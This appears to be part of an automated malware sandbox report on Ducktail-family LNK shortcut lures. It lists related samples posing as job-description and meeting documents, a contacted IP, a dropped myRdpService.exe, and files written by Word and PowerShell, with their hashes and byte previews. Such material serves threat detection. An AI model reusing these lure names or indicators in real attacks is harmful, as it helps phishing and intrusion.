                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                  • 172.67.137.62
                                                                  eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Windows\Temp\myRdpService.exeU82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                    ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                      z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                        About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                          Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                            6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                              Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                                    H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):118
                                                                                      Entropy (8bit):3.5700810731231707
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                      Malicious:false
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                      C:\ProgramData\Microsoft\Office\Licenses\5\Perpetual\21661362613116367064193984360 (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):19716
                                                                                      Entropy (8bit):3.8820164939024657
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:8yD8Gqcbitsd+NdsnFaFDUZYG+w1mmHlJGQpPcMautt4P/GIF+H0a:8yD8GritTnbpel+Fl2Pcu4PXF+Ua
                                                                                      MD5:CDF82995E97D051D59E551F7A5AADA12
                                                                                      SHA1:1CA7B9E30C87B2CA21536BF69C1183C8E17C1DC9
                                                                                      SHA-256:FD152FD4F865AB89880E93C07ACDA20E3E4B0F5AA61A71757EC397955B16573C
                                                                                      SHA-512:D6541088200311E93C50954D1BFC05DC62FDEF3BE32919F180F9ADC831292017C6781E990DC93747489953ECB0D2F24FD60C49D0E4F34E097EE2B94441CF6020
                                                                                      Malicious:false
                                                                                      Preview:{.".L.i.c.e.n.s.e.".:.".e.y.J.V.c.2.V.y.U.H.J.v.Z.m.l.s.Z.U.l.k.I.j.p.u.d.W.x.s.L.C.J.N.Y.X.h.E.Z.X.Z.p.Y.2.V.z.Q.W.x.s.b.3.d.l.Z.C.I.6.M.S.w.i.Q.W.N.0.a.X.Z.h.d.G.l.v.b.k.R.h.d.G.U.i.O.i.I.y.M.D.I.z.L.T.A.4.L.T.E.3.V.D.E.y.O.j.I.1.O.j.U.4.L.j.Y.w.M.T.E.x.N.T.d.a.I.i.w.i.R.X.J.y.b.3.J.G.Y.W.x.s.Y.m.F.j.a.0.N.h.d.G.V.n.b.3.J.5.I.j.p.u.d.W.x.s.L.C.J.S.Z.W.5.l.d.2.F.s.V.G.9.r.Z.W.4.i.O.i.J.l.e.U.p.K.W.k.d.W.d.W.R.H.b.D.B.l.U.0.k.2.S.W.x.0.V.m.M.y.V.n.l.T.V.1.E.5.V.j.B.4.S.l.J.D.M.H.d.N.R.E.F.6.T.k.R.B.d.0.1.U.R.T.J.O.e.m.R.G.U.k.R.j.M.0.8.w.T.n.B.a.R.D.A.0.T.m.p.J.N.F.p.H.T.T.F.O.R.F.p.r.W.X.p.r.N.U.5.E.W.T.V.P.M.D.V.o.Y.l.d.V.O.U.1.E.Q.X.d.N.e.l.F.3.T.U.R.F.e.E.5.q.Y.z.N.S.V.V.E.z.T.j.E.w.a.U.x.D.S.k.l.Z.W.E.p.r.Z.D.J.G.e.V.p.V.b.G.t.J.a.m.9.p.U.U.R.F.M.0.5.6.T.T.J.N.a.k.U.x.T.W.p.N.e.k.5.E.V.X.l.N.R.E.k.x.T.m.p.F.d.0.1.E.R.T.R.O.a.k.V.6.T.X.p.j.e.U.9.U.Y.3.p.O.e.l.F.3.T.W.p.V.d.0.1.U.a.3.d.N.V.F.k.1.T.0.R.J.N.U.1.6.Y.z.V.O.R.G.c.w.T.k.R.n.d.0.5.U.T.T.N.O.a.k.U.y.T.X.p.N.N.E.9.U.V.X.d.P.

                                                                                      C:\Users\user\AppData\LocalLow\Intel\ShaderCache\55358e20b61aed6fcad5b2283103fb1fe9f3dd3668577b575161f953d12f5a3f

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):97678
                                                                                      Entropy (8bit):7.9474672288284465
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:uqc7pHXAsaUM1YiadRi0tj3hj3ZbMbyAeM21n6mPPTP0QojNhEVyWC2:Zc76saUM6iadjJx3ZbUyg2tP70QS2yWT
                                                                                      MD5:36B17E086CE52571F9A397D31328C285
                                                                                      SHA1:A4218DACB7755F152B3A84406CD835FF61CE300B
                                                                                      SHA-256:4A60FEB0F18EA0E34C6AA4DF0DA6314636270E74D13675F1577055089011DD37
                                                                                      SHA-512:3016EFDAC8AD89805415B29576D88453BD264DC424048D7B267F24E458202FE768B782C1EB57E7DE0D6E1A75BDD149123CEFCC70F488A4931B55A68B7AAA41E0
                                                                                      Malicious:false
                                                                                      Preview:INSC.>.....Mar222021151921.38._......?Y... j.1/....s.h...fE............................0..bx.c`@.....^2200..A.....,.X)..(]..n(@.......Kc03.....}.......OB...d.?P... q.f.I..@j.........x.A#. ......Q@..C.#..!.`.U.....G..}..3....q.3B..*.4...=... .o... .....bJ.......c.~.`..pE0z"....xcu@.....P...7..;...#C...;.e.y@?.......P>(...v..(L@..P{.|nF..jf.0]...kY!t....Y......('.....e`>.7.f..b0fH`..`d.........O`...a..v...D.....v.....|B3...P...x.cD.@v.h....[j..."._.=.).HZ....t..................A...Xjx..Io.@..=vl.R.hX.NYR@.f......."T.-.LY...C..zB..7....8...*.M%..H.....Q.*.HL4....e.q..G...K....Z..\...'PXa.|.V2.....>.|q>;9o...o.,|n.!..J.......I..P.P....7..l.?.)m...._,....M...=..c.....w.....Y.~.o...."../....V)N...Q.^!.D...M.w.iLd.+4\"...n..T.w.F%..u./..2.|.v.`h..FEj~..}.5j~.D.j._.5_(..(-Do.Fu.2......E.S. :.Qt.&..E.m.......J..GD."o.yO.k.:....D.S..@.3.s.u..%......7P.&..B..s.....!...6.........9.>...g...R...._f..0.1...s<..4.....}./P..:.~\..c....1h.}\.....=..ub

                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2278
                                                                                      Entropy (8bit):3.841337155703356
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:uiTrlKxsxxxyxl9Il8uCX1Z/MUUSJstJHqul68Q79Wd1rc:vMY4r6S0tl/Q79N
                                                                                      MD5:352AC368BA80A2A25EB29DA3010832E3
                                                                                      SHA1:DEA43A2E88186296BEE6DF41DDC008EA03CE788B
                                                                                      SHA-256:72974E519DCA123AA9B98E26D16FEACF77607BC33E608DE75D76E2F6BC8D1640
                                                                                      SHA-512:5C96FBA9FD92C332B3A45902429F70BE1F6120887675466E611AA4B310CE44B16317FBAA4CF10E85115107020AFC69AB3560D0A0375C9F6C41466D5B60AADA2B
                                                                                      Malicious:false
                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.D.f.9.Z.M.s.x.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.d./.D.2.y.

                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4542
                                                                                      Entropy (8bit):3.9963484268173293
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:cYdfa0Cu86x/EZ9f5AePcil6cT9s2ZnWF:cg9CuFMh5k+DZWF
                                                                                      MD5:F412885BFF9FC189F61F888B2C26BD57
                                                                                      SHA1:03719231702C2B66C59AD3C4E7F2E864219EE179
                                                                                      SHA-256:9B95FFBFD5FB6EE53DFA9289D9C71448EEDC76C418AD786F50C5AE87B2C19132
                                                                                      SHA-512:88702BF79C44BA3E77EF3E35B23C74144EEC66866DA1275F7BE1AD8A2D20251DD27E7A87E5DD541648C8D1978DCC7EE7CD1E85134BB48A6CA12C5E055E4E1CB5
                                                                                      Malicious:false
                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".f.4.D.x.S.s.M.x.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.d./.D.2.y.

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{51CD9FF1-3B6A-49B1-8AAE-1AB578AF5D33}.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7680
                                                                                      Entropy (8bit):2.9512433794472672
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:afIfomE2Mf+Q/eYqff33wlf70YLfBzDl4ucf+BvRe2a+DFtnUbw1fWJuQBfJjcer:aAbMx/1q3wlzxnwghNzndn8hbv82ng+
                                                                                      MD5:FB12F9E89DE442787D46F810AB09CD9C
                                                                                      SHA1:89FED423F0E38D94DA6CBC5FF95A8237C89BA908
                                                                                      SHA-256:F07B40C756C15806E2A51AA31131AA1C43B79915247158D967E6E6BEC37D1187
                                                                                      SHA-512:3791208809D1DF36A719F0C156EADEA73F626025FE36500128A11117FD402A19DA73E639B865E876E2A20A3404969D6C97849E3B8ED7F4C5B18D74AD16E31D6B
                                                                                      Malicious:false
                                                                                      Preview:..H.a.v.a.s. .G.l.o.b.a.l. .O.v.e.r.v.i.e.w.....H.a.v.a.s. .G.l.o.b.a.l. .i.s. .a. .l.e.a.d.i.n.g. .i.n.t.e.r.n.a.t.i.o.n.a.l. .a.d.v.e.r.t.i.s.i.n.g. .a.n.d. .c.o.m.m.u.n.i.c.a.t.i.o.n.s. .a.g.e.n.c.y.,. .r.e.n.o.w.n.e.d. .f.o.r. .i.t.s. .i.n.n.o.v.a.t.i.v.e. .d.i.g.i.t.a.l. .s.t.r.a.t.e.g.i.e.s. .a.n.d. .c.o.m.p.r.e.h.e.n.s.i.v.e. .a.p.p.r.o.a.c.h. .t.o. .m.o.d.e.r.n. .m.a.r.k.e.t.i.n.g... .W.i.t.h. .a. .s.t.r.o.n.g. .e.m.p.h.a.s.i.s. .o.n. .d.i.g.i.t.a.l. .n.a.t.i.v.e. ...............................................0...........R...T...l...n...................................................N...P...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20010
                                                                                      Entropy (8bit):5.02483968322263
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:KiQ0HzAFbFXX359ib4DVVHWrxpUUpXoCwiopbjvwRjdvRlYfWkib45OvQJvOjJx:KinHzwZH3FVVHWrxpUUpXoCwiopbjoRd
                                                                                      MD5:07388C6CFA6BC904B45FA7E168B899FD
                                                                                      SHA1:AAA45F87E01D4C0684789D16B887A984FDDBC506
                                                                                      SHA-256:608907B69D3275653775ACFA2E4782294711F87979921D3E6557DEE6847F3035
                                                                                      SHA-512:44CAD5B149165FEFB23572E09E15FF5C162E96220E20E0D84B02AD73B0080E863C387BFF93B7C98BE79C49870B37C8F0E701D6D02648B2A4CD61E544EE9F15E5
                                                                                      Malicious:false
                                                                                      Preview:PSMODULECACHE......wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Get-Date........Clear-Variable........Get-EventSubscriber........Import-Csv........Get-Variable........New-Variable........Compare-Object........New-TemporaryFile........Convert-String........New-Alias........Export-Csv........Get-Event........Set-TraceSource........ConvertTo-Csv........ConvertFrom-Json........Get-PSCallStack........

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1760
                                                                                      Entropy (8bit):5.6874298976452335
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:OSp4iiqbymx+g9qr9tz4RIoUl8N0+5nOA+G0DlINqzKjlzI:jyYv39qrfIfSKr5nOA9WlIpZk
                                                                                      MD5:A529A44EF08266953101ABC20CAB6A92
                                                                                      SHA1:66B2D1666D9DE48092C3BDCE48981615E95A66D8
                                                                                      SHA-256:B6BA55C098FA541DB1896284016465677047B296AB69C80528C5F5E46868B39E
                                                                                      SHA-512:8609D1A850A6D95BB95AB525EA371F10D434A756EC69DCC14101BFBED48BAA37E913C3AB984F652D898D97EF06C1F420DE053D8CCA6A59AE3F09EF5122557036
                                                                                      Malicious:false
                                                                                      Preview:@...e...........R.....................,..............@..........@................P....bG....zI..........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0..................)W_tD...B..T.........System..4...............-..Q...H..g............System.Core.D................g$H..K..I.............System.Management.Automation<.................YS.eE..9.G...........System.Management...@...............8Ak....G.......j........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4................x..:.9@.N4Jgf..........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                      C:\Users\user\AppData\Local\Temp\4809678F.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):19716
                                                                                      Entropy (8bit):3.8820164939024657
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:8yD8Gqcbitsd+NdsnFaFDUZYG+w1mmHlJGQpPcMautt4P/GIF+H0a:8yD8GritTnbpel+Fl2Pcu4PXF+Ua
                                                                                      MD5:CDF82995E97D051D59E551F7A5AADA12
                                                                                      SHA1:1CA7B9E30C87B2CA21536BF69C1183C8E17C1DC9
                                                                                      SHA-256:FD152FD4F865AB89880E93C07ACDA20E3E4B0F5AA61A71757EC397955B16573C
                                                                                      SHA-512:D6541088200311E93C50954D1BFC05DC62FDEF3BE32919F180F9ADC831292017C6781E990DC93747489953ECB0D2F24FD60C49D0E4F34E097EE2B94441CF6020
                                                                                      Malicious:false
                                                                                      Preview:{.".L.i.c.e.n.s.e.".:.".e.y.J.V.c.2.V.y.U.H.J.v.Z.m.l.s.Z.U.l.k.I.j.p.u.d.W.x.s.L.C.J.N.Y.X.h.E.Z.X.Z.p.Y.2.V.z.Q.W.x.s.b.3.d.l.Z.C.I.6.M.S.w.i.Q.W.N.0.a.X.Z.h.d.G.l.v.b.k.R.h.d.G.U.i.O.i.I.y.M.D.I.z.L.T.A.4.L.T.E.3.V.D.E.y.O.j.I.1.O.j.U.4.L.j.Y.w.M.T.E.x.N.T.d.a.I.i.w.i.R.X.J.y.b.3.J.G.Y.W.x.s.Y.m.F.j.a.0.N.h.d.G.V.n.b.3.J.5.I.j.p.u.d.W.x.s.L.C.J.S.Z.W.5.l.d.2.F.s.V.G.9.r.Z.W.4.i.O.i.J.l.e.U.p.K.W.k.d.W.d.W.R.H.b.D.B.l.U.0.k.2.S.W.x.0.V.m.M.y.V.n.l.T.V.1.E.5.V.j.B.4.S.l.J.D.M.H.d.N.R.E.F.6.T.k.R.B.d.0.1.U.R.T.J.O.e.m.R.G.U.k.R.j.M.0.8.w.T.n.B.a.R.D.A.0.T.m.p.J.N.F.p.H.T.T.F.O.R.F.p.r.W.X.p.r.N.U.5.E.W.T.V.P.M.D.V.o.Y.l.d.V.O.U.1.E.Q.X.d.N.e.l.F.3.T.U.R.F.e.E.5.q.Y.z.N.S.V.V.E.z.T.j.E.w.a.U.x.D.S.k.l.Z.W.E.p.r.Z.D.J.G.e.V.p.V.b.G.t.J.a.m.9.p.U.U.R.F.M.0.5.6.T.T.J.N.a.k.U.x.T.W.p.N.e.k.5.E.V.X.l.N.R.E.k.x.T.m.p.F.d.0.1.E.R.T.R.O.a.k.V.6.T.X.p.j.e.U.9.U.Y.3.p.O.e.l.F.3.T.W.p.V.d.0.1.U.a.3.d.N.V.F.k.1.T.0.R.J.N.U.1.6.Y.z.V.O.R.G.c.w.T.k.R.n.d.0.5.U.T.T.N.O.a.k.U.y.T.X.p.N.N.E.9.U.V.X.d.P.

                                                                                      C:\Users\user\AppData\Local\Temp\About-Us.docx.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):13823
                                                                                      Entropy (8bit):7.284379185025424
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:a6Xm4HgIHdNxt/ZtNN3qtGFKEBCtxAjyYL2:lHfxllN3qtoKEByn
                                                                                      MD5:8EADF0EA980EC7DA47A6564A84DB9596
                                                                                      SHA1:16BA0DE3320A490CD85274CA6C316FA7B9811F8F
                                                                                      SHA-256:A39D9726A4950E4D1563A1F7141C75E0C2BE260FCA41A8BDA4386D6B8101E91D
                                                                                      SHA-512:1FA88005393B3DF31AB078E756D06FF699B6866C85D48C95A6AE2CD3835E0AE021D9561816AD4569B94DF76D96CE40F10905FACA3C3F4F5CC92CD5F20EC8A144
                                                                                      Malicious:false
                                                                                      Preview:PK..........!...lZ... .......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E......Ub.*..>.-R...{.V.......QU...l"%3..3V...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$z.3....3.......%p)O....^......5}nH".d.s.Xg.L.`....|...|.P.r.s.....?.PW...t.t4Q+..".wa...|T\y...,N....U.%...-D/......X...(.....<E....)....;.N..L?.F.........<Fk...h..y........q..i..?..l..i..1...].H.g...m.@.....m........PK..........!.........N......._rels/.rels ...(.......................................

                                                                                      C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1731059156762881100_2E045159-CF3D-4E90-9765-762D1D354EE2.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:ASCII text, with very long lines (14361), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):16777216
                                                                                      Entropy (8bit):0.027696531805065223
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:hMj4OYPSDtT3QIaBHUEbsowzqgUTf/mnjDNjbBC:QBiTf
                                                                                      MD5:9D3E28574499F29D871D9D21F47B3888
                                                                                      SHA1:12D9F67358EE98A2DA09CB1547AD216FE027ED00
                                                                                      SHA-256:1AAA87E5126F17FBF2C2521856EE0FD0681982071BCD6EE5AF3CF41D2755DA96
                                                                                      SHA-512:958536F989E955FE6CAB4D1A980EE36613F695509383D982BC26B3F20FDD6A065C4E528E477945548B114857B77CE6E37AA9EADB704C5F371613549BFC9A69AF
                                                                                      Malicious:false
                                                                                      Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/08/2024 09:45:57.343.WINWORD (0x2294).0x2298.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Word.FileOpen.UserInitiatedOpen","Flags":2814775553802753,"InternalSequenceNumber":60,"Time":"2024-11-08T09:45:57.343Z","Contract":"Office.System.Activity","Activity.CV":"WVEELj3PkE6XZXYtHTVO4g.1.18","Activity.Duration":226504,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Activity.Result.Code":0,"Activity.Result.Tag":37262085,"Data.OpenInitiateKind":3,"Data.fOpenFromBoot":true,"Data.fZrtOpenRequested":true,"Data.zrtRequestedReason":4,"Data.ScanRequiredResult":0,"Data.fFileAlreadyOpen":0,"Data.FileIOClpState":0,"Data.MainPdod":2361451651600,"Data.Measurements":"cZ20ib4ii7iG3iL9iU1iY22ja1jd1jh9ji1jj8jk46jl4jm2jn2jo9jr7js2jx9jN1ks12kx1lf2a28ymo0b222","Data.TrackbackTag":37262080,"Data.IntermediateResultsTotalCount":1,"Data.IntermediateResults":"[{\"Code\":0,\"Tag\":37262085}]","D

                                                                                      C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1731059156764174400_2E045159-CF3D-4E90-9765-762D1D354EE2.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16777216
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:2C7AB85A893283E98C931E9511ADD182
                                                                                      SHA1:3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
                                                                                      SHA-256:080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
                                                                                      SHA-512:7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\RESAEBA.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 8 09:45:44 2024, 1st section name ".debug$S"
                                                                                      Category:dropped
                                                                                      Size (bytes):1336
                                                                                      Entropy (8bit):3.9961320158331177
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HTYim9hwB+0KrHCwKGmNII+ycuZhNzCakSCDPNnqSSd:M90K5KGmu1ulzCa3CpqSC
                                                                                      MD5:69C8B59CC52496BAD4C97138A8F7F7FC
                                                                                      SHA1:24AC64179E166BE39C96ECED88CEF2DF7EC23A7B
                                                                                      SHA-256:E6EDFB0D244DA2A37B960A450CCB849ED187322C9AC1632D5E385A9FC5BBB147
                                                                                      SHA-512:11C432C4ABFBAD83C2669A3C7119240F95E14E0D87F776D3EA933A9BE3DFA965A55DDF26E06E97961A364D920841E8CF9DD7FECED214F534F62ECACD8653D039
                                                                                      Malicious:false
